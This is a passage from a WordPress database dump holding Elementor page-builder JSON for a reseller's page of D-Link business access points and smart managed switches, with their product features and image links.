]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7480,3397,'_elementor_version','2.5.14'),(7481,3397,'_elementor_edit_mode','builder'),(7499,3400,'_elementor_template_type','post'),(7500,3400,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access 